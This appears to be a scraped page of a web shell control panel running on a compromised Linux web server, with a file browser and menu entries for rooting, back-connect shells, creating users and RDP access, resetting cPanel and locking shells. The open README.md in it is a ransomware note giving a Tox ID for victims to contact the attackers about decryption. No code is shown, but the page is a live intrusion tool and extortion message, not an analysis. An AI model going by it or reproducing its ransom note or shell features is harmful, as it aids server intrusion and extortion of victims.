Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
cpanel /
libargon2 /
[ HOME SHELL ]
Name
Size
Permission
Action
lib64
[ DIR ]
drwxr-xr-x
share
[ DIR ]
drwxr-xr-x
README.md
404
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
Please contact us through the qtox tool Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox If you can't contact us, please contact some data recovery company(suggest taobao.com), may they can contact to us. Add our TOX ID and send an encrypted file and 'Sorry-ID' for testing decryption. Our TOX ID: 3D7889AEC00F2325E1A3FBC0ACA4E521670497F11E47FDE13EADE8FED3144B5EB56D6B198724
Close